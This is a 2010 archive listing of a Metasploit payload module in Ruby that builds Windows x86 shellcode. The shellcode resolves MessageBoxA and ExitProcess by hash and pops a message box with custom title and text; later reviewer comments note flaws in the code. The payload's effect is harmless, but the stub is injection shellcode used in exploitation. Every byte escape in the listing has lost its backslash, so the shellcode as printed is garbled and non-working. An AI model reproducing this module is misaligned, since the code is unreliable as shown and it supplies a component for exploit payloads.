win32 MessageBox (Metasploit module) shellcode
Posted on 25 March 2010
# ============================================== win32 MessageBox (Metasploit module) shellcode ==============================================
##
# $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
##

#
# Installation instructions :
# Drop file in framework3/modules/payloads/singles/windows folder
#
# Usage : ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
#
# NOTE(review): in this copy of the listing every "\xNN" escape has lost its
# backslash ("xd9xeb..."), so as printed the literals below are plain ASCII
# text rather than raw bytes; the module as originally published presumably
# used "\x" escapes throughout. Nothing else in the file is affected, but the
# comments that describe individual bytes assume the escaped form.

require 'msf/core'

# Single-stage x86 Windows payload: a position-independent stub that resolves
# MessageBoxA / ExitProcess (or ExitThread) by API hash and pops a message box
# whose title and text are supplied through the TITLE / TEXT datastore options.
# generate() appends the user strings to the fixed stub as 4-byte PUSH immediates.
module Metasploit3

  include Msf::Payload::Windows
  include Msf::Payload::Single

  # Registers module metadata and the fixed part of the shellcode ('Payload').
  # The framework's generic EXITFUNC option is removed and replaced with a
  # restricted OptString, because generate() only knows the hashes for
  # ExitProcess and ExitThread (see strExitFuncHash below).
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Messagebox with custom title and text',
      'Version'       => '$Revision: 4 $',
      'Description'   => 'Spawns MessageBox with a customizable title & text',
      'Author'        =>
        [
          'corelanc0d3r - peter.ve[at]corelan.be',
          'rick2600 - ricks2600[at]gmail.com'
        ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86,
      'Privileged'    => false,
      'Payload'       =>
        {
          'Offsets' => { },
          # Fixed prologue: the hash-based API resolver stub. generate() reads
          # this back via module_info['Payload']['Payload'] and appends to it;
          # no patching of 'Offsets' is done.
          'Payload' =>
            "xd9xebx9bxd9x74x24xf4x31"+
            "xd2xb2x7ax31xc9x64x8bx71"+
            "x30x8bx76x0cx8bx76x1cx8b"+
            "x46x08x8bx7ex20x8bx36x38"+
            "x4fx18x75xf3x59x01xd1xff"+
            "xe1x60x8bx6cx24x24x8bx45"+
            "x3cx8bx54x05x78x01xeax8b"+
            "x4ax18x8bx5ax20x01xebxe3"+
            "x37x49x8bx34x8bx01xeex31"+
            "xffx31xc0xfcxacx84xc0x74"+
            "x0axc1xcfx0dx01xc7xe9xf1"+
            "xffxffxffx3bx7cx24x28x75"+
            "xdex8bx5ax24x01xebx66x8b"+
            "x0cx4bx8bx5ax1cx01xebx8b"+
            "x04x8bx01xe8x89x44x24x1c"+
            "x61xc3xb2x08x29xd4x89xe5"+
            "x89xc2x68x8ex4ex0execx52"+
            "xe8x9cxffxffxffx89x45x04"+
            "xbb"
        }
      ))

    # EXITFUNC : Only support Process and Thread :/
    deregister_options('EXITFUNC')

    # Register MessageBox options.
    # TITLE's "max 255 chars" is enforced in generate() (see the iTitle check);
    # TEXT is documented without a limit but generate() has no guard for it.
    register_options(
      [
        OptString.new('EXITFUNC', [ false, "Only Process (default) or Thread are supported","process"]),
        OptString.new('TITLE', [ true, "Messagebox Title (max 255 chars)" ]),
        OptString.new('TEXT', [ true, "Messagebox Text" ])
      ], self.class)
  end

  #
  # Constructs the payload
  #
  # Reads datastore['EXITFUNC'], datastore['TITLE'] and datastore['TEXT'],
  # builds the PUSH sequences that place title and text on the stack, and
  # returns the complete shellcode as a String.
  #
  # Raises ArgumentError when the (sentinel-extended) title is 256 chars or
  # longer. Returns nil when TITLE is unset, since the outer `if (strTitle)`
  # has no else branch.
  #
  # Both strings are copied into the payload verbatim as PUSH immediates; no
  # bad-character filtering is applied here, so any byte in TITLE/TEXT ends up
  # in the generated code unchanged.
  #
  def generate
    strExitFunc = datastore['EXITFUNC'] || "process"
    # 4-byte API hash consumed by the resolver stub (per the author's comment).
    strExitFuncHash = "x7exd8xe2x73" #ExitProcess()
    strTitle = datastore['TITLE']
    if (strTitle)
      #ExitFunc
      # Case-insensitive; anything other than "thread" keeps the ExitProcess hash.
      if (strExitFunc) then
        strExitFunc=strExitFunc.downcase
        if strExitFunc == "thread" then
          strExitFuncHash="xEFxCExE0x60" #ExitThread()
        end
      end

      #================Process Title==================================
      # "X" is a sentinel: it marks where the terminating NUL must be written
      # once the string is on the stack (index iSniperTitle, set below).
      strTitle=strTitle+"X"
      iTitle=strTitle.length
      # Length check happens after the sentinel was appended, so the effective
      # user limit is 254 characters, not the 255 the option text promises.
      # The bound mainly keeps iSniperTitle.chr below 256 (Integer#chr raises
      # RangeError above 255).
      if (iTitle < 256)
        iNrLines=iTitle/4
        iCheckChars = iNrLines * 4
        strSpaces=""
        iSniperTitle=iTitle-1
        # Pad with spaces up to the next multiple of 4 so every PUSH carries a
        # full 32-bit immediate.
        if iCheckChars != iTitle then
          iTargetChars=(iNrLines+1)*4
          while iTitle < iTargetChars
            strSpaces+=" " #add space
            iTitle+=1
          end
        end
        strTitle=strTitle+strSpaces
        #title is now 4 byte aligned
        #and string ends with X
        #at index iSniperTitle
        #push Title to stack
        #start at back of string
        # Walk the string backwards, collecting 4 chars per PUSH so that the
        # last PUSH leaves the first character at the lowest address (ESP).
        strPushTitle=""
        strLine=""
        icnt=strTitle.length-1
        icharcnt=0
        while icnt >= 0
          thisChar=strTitle[icnt,1]
          strLine=thisChar+strLine
          if icharcnt < 3
            icharcnt+=1
          else
            strPushTitle=strPushTitle+"h"+strLine #h = 68 = push
            strLine=""
            icharcnt=0
          end
          icnt=icnt-1
        end
        #generate opcode to write null byte
        # NOTE(review): presumably xor ebx,ebx ; mov [esp+disp8],bl ; mov ebx,esp
        # with iSniperTitle as the disp8. A disp8 is sign-extended, so indices
        # above 127 would address below ESP rather than the sentinel; the 256
        # check above does not cover that range -- TODO confirm intended limit.
        # An empty TITLE gives iSniperTitle == 0, i.e. a 0x00 byte in the payload.
        strWriteTitleNull="x31xDBx88x5Cx24"
        strWriteTitleNull += iSniperTitle.chr + "x89xe3"

        #================Process Text===============================
        #cut text into 4 byte push instructions
        # Same scheme as the title. There is no length check here: a TEXT of
        # 255+ characters makes iSniperText.chr raise RangeError instead of
        # the ArgumentError used for the title.
        strText = datastore['TEXT']
        strText=strText+"X"
        iText=strText.length
        iNrLines=iText/4
        iCheckChars = iNrLines * 4
        strSpaces=""
        iSniperText=iText-1
        if iCheckChars != iText then
          iTargetChars=(iNrLines+1)*4
          while iText < iTargetChars
            strSpaces+=" " #add space
            iText+=1
          end
        end
        strText=strText+strSpaces
        #text is now 4 byte aligned
        #and string ends with X
        #at index iSniperText
        #push Text to stack
        #start at back of string
        strPushText=""
        strLine=""
        icnt=strText.length-1
        icharcnt=0
        while icnt >= 0
          thisChar=strText[icnt,1]
          strLine=thisChar+strLine
          if icharcnt < 3
            icharcnt+=1
          else
            strPushText=strPushText+"h"+strLine #h = 68 = push
            strLine=""
            icharcnt=0
          end
          icnt=icnt-1
        end
        #generate opcode to write null byte
        # Same disp8 caveat as for the title; ECX is used instead of EBX.
        strWriteTextNull="x31xc9x88x4Cx24"
        strWriteTextNull += iSniperText.chr + "x89xe1"

        #build payload
        # Fixed stub, then the exit-function hash, then the glue that loads
        # user32.dll and resolves MessageBoxA, then the two strings, then the call.
        payload_data = module_info['Payload']['Payload']
        payload_data += strExitFuncHash
        payload_data += "x87x1cx24"
        payload_data += "x52xe8x8bxffxffxffx89x45"
        # The bytes 75 73 65 72 / 33 32 2e 64 / 6c 6c 20 are ASCII "user",
        # "32.d", "ll " -- this looks like "user32.dll" being pushed, with the
        # trailing byte then overwritten via the [esp+0x0a] store (hedged).
        payload_data += "x08x68x6cx6cx20xffx68x33"
        payload_data += "x32x2ex64x68x75x73x65x72"
        payload_data += "x88x5cx24x0ax89xe6x56xff"
        payload_data += "x55x04x89xc2x50xbbxa8xa2"
        payload_data += "x4dxbcx87x1cx24x52xe8x5e"
        payload_data += "xffxffxff"
        payload_data += strPushTitle + strWriteTitleNull
        payload_data += strPushText + strWriteTextNull
        payload_data += "x31xd2x52"
        payload_data += "x53x51x52xffxd0x31xc0x50"
        payload_data += "xffx55x08"
        return payload_data
      else
        raise ArgumentError, "Title should be 255 characters or less"
      end
    end
  end
end

# Inj3ct0r.com [2010-03-25]